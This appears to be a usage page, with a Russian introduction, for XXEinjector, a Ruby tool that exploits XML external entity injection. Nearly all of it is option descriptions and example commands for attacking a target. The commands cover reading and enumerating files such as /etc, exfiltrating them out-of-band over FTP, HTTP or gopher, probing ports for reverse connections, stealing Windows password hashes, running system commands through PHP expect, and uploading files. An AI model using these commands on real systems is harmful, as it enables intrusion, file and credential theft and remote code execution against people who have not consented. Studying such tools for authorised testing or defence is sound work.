XXEinjector автоматизирует получение файлов с использованием прямых и внеполосных методов. Список каталогов работает только в приложениях Java. Для других приложений необходимо использовать метод брутфорса.
--file Mandatory - file containing valid HTTP request with xml. You can also mark
with "XXEINJECT" a point where DTD should be injected. (--file=/tmp/req.txt)
--path Mandatory if enumerating directories - Path to enumerate. (--path=/etc)
--brute Mandatory if bruteforcing files - File with paths to bruteforce.
--logger Log results only. Do not send requests. HTTP logger looks for "p" parameter
with results.
--rhost Remote host's IP address or domain name. Use this argument only for requests
without Host header. (--rhost=
--rport Remote host's TCP port. Use this argument only for requests without Host
header and for non-default values. (--rport=8080)
--oob Out of Band exploitation method. FTP is default. FTP can be used in any
application. HTTP can be used for bruteforcing and enumeration through
directory listing in Java < 1.7 applications. Gopher can only be used in
Java < 1.7 applications. (--oob=http/ftp/gopher)
--direct Use direct exploitation instead of out of band. Unique mark should be
specified as a value for this argument. This mark specifies where results
of XXE start and end. Specify --xml to see how XML in request file should
look like. (--direct=UNIQUEMARK)
--cdata Improve direct exploitation with CDATA. Data is retrieved directly, however
OOB is used to construct CDATA payload. Specify --cdata-xml to see how
request should look like in this technique.
--2ndfile File containing valid HTTP request used in second order exploitation.
--phpfilter Use PHP filter to base64 encode target file before sending.
--netdoc Use netdoc protocol instead of file (Java).
--enumports Enumerating unfiltered ports for reverse connection. Specify value "all" to
enumerate all TCP ports. (--enumports=21,22,80,443,445)
--hashes Steals Windows hash of the user that runs an application.
--expect Uses PHP expect extension to execute arbitrary system command. Best works
with HTTP and PHP filter. (--expect=ls)
--upload Uploads specified file using Java jar schema into temp file.
--xslt Tests for XSLT injection.
--ssl Use SSL.
--proxy Proxy to use. (--proxy=
--httpport Set custom HTTP port. (--httpport=80)
--ftpport Set custom FTP port. (--ftpport=21)
--gopherport Set custom gopher port. (--gopherport=70)
--jarport Set custom port for uploading files using jar. (--jarport=1337)
--xsltport Set custom port for XSLT injection test. (--xsltport=1337)
--test This mode shows request with injected payload and quits. Used to verify
correctness of request without sending it to a server.
--urlencode URL encode injected DTD. This is default for URI.
--nodtd If you want to put DTD in request by yourself. Specify "--dtd" to show
how DTD should look like.
--output Output file for bruteforcing and logger mode. By default it logs to
brute.log in current directory. (--output=/tmp/out.txt)
--timeout Timeout for receiving file/directory content. (--timeout=20)
--contimeout Timeout for closing connection with server. This is used to prevent
DoS condition. (--contimeout=20)
--fast Skip asking what to enumerate. Prone to false-positives.
--verbose Show verbose messages.
Пример использования:
Enumerating /etc directory in HTTPS application:
ruby XXEinjector.rb --host= --path=/etc --file=/tmp/req.txt --ssl
Enumerating /etc directory using gopher for OOB method:
ruby XXEinjector.rb --host= --path=/etc --file=/tmp/req.txt --oob=gopher
Second order exploitation:
ruby XXEinjector.rb --host= --path=/etc --file=/tmp/vulnreq.txt
Bruteforcing files using HTTP out of band method and netdoc protocol:
ruby XXEinjector.rb --host= --brute=/tmp/filenames.txt --file=/tmp/req.txt
--oob=http --netdoc
Enumerating using direct exploitation:
ruby XXEinjector.rb --file=/tmp/req.txt --path=/etc --direct=UNIQUEMARK
Enumerating unfiltered ports:
ruby XXEinjector.rb --host= --file=/tmp/req.txt --enumports=all
Stealing Windows hashes:
ruby XXEinjector.rb --host= --file=/tmp/req.txt --hashes
Uploading files using Java jar:
ruby XXEinjector.rb --host= --file=/tmp/req.txt --upload=/tmp/uploadfile.pdf
Executing system commands using PHP expect:
ruby XXEinjector.rb --host= --file=/tmp/req.txt --oob=http --phpfilter
Testing for XSLT injection:
ruby XXEinjector.rb --host= --file=/tmp/req.txt --xslt
Log requests only:
ruby XXEinjector.rb --logger --oob=http --output=/tmp/out.txt